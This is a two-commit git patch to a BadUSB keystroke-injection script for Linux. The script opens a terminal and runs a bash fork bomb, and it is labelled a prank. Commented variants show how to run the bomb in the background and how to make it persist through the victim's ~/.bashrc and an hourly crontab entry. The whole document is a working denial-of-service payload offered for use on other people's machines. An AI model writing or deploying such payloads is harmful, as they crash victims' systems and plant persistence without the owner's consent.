From 1e7d857f83e739eaf83f66e8f6970937bc93ea62 Mon Sep 17 00:00:00 2001 From: FalsePhilosopher Date: Fri, 15 Jul 2022 11:01:11 -0600 Subject: [PATCH 1/2] Fixed/updated forkbomb --- BadUSB/ForkBomb-Linux.txt | 25 ++++++++++++++++++++----- 1 file changed, 20 insertions(+), 5 deletions(-) diff --git a/BadUSB/ForkBomb-Linux.txt b/BadUSB/ForkBomb-Linux.txt index 6abdee447..d71277959 100644 --- a/BadUSB/ForkBomb-Linux.txt +++ b/BadUSB/ForkBomb-Linux.txt @@ -1,9 +1,24 @@ -REM ForkBomb-Linux -REM By 7h30th3r0n3 -GUI r +REM Title: Forkbomb +REM Author: FalsePhilosopher +REM Target: Unix-like tested on kubuntu 22.04. +REM Props: Hak5, 7h30th3r0n3 for the initial submission of a simpler version of drapl0n's terminalbomb script, UberGuidoZ for keeping the flipper repo going. +REM Version: 1.0 +REM Category: Prank +REM Launches terminal and spawns a terminal forkbomb +REM DELAY 300 -STRING terminal +REM Minimize all windows as that ensures launch happens smoother. +WINDOWS d +DELAY 300 +CTRL-ALT t +DELAY 2000 ENTER DELAY 300 -STRING :(){:|:&};: +STRING :(){ :|:& };: ENTER +REM If you want to do it in the background so you can close the terminal with adding ALT F4 +REM STRING nohup :(){ :|:& };: >> /dev/null & +REM if you want to do it every time they open a terminal like drapl0n's terminalbomb style +REM STRING echo ":(){ :|:& };:" >> ~/.bashrc +REM if you want to make it happen every hour +REM STRING crontab -l | sed "\$a\@hourly sh :(){ :|:& };:" | crontab - From 0d83983e361e150b4e9a30c1c91b6e1e76e5a32f Mon Sep 17 00:00:00 2001 From: FalsePhilosopher Date: Fri, 15 Jul 2022 11:06:27 -0600 Subject: [PATCH 2/2] cleanup forkbomb --- BadUSB/ForkBomb-Linux.txt | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/BadUSB/ForkBomb-Linux.txt b/BadUSB/ForkBomb-Linux.txt index d71277959..6ecee34ce 100644 --- a/BadUSB/ForkBomb-Linux.txt +++ b/BadUSB/ForkBomb-Linux.txt @@ -1,4 +1,4 @@ -REM Title: Forkbomb +REM Title: Terminal forkbomb REM Author: FalsePhilosopher REM Target: Unix-like tested on kubuntu 22.04. REM Props: Hak5, 7h30th3r0n3 for the initial submission of a simpler version of drapl0n's terminalbomb script, UberGuidoZ for keeping the flipper repo going. @@ -12,8 +12,6 @@ WINDOWS d DELAY 300 CTRL-ALT t DELAY 2000 -ENTER -DELAY 300 STRING :(){ :|:& };: ENTER REM If you want to do it in the background so you can close the terminal with adding ALT F4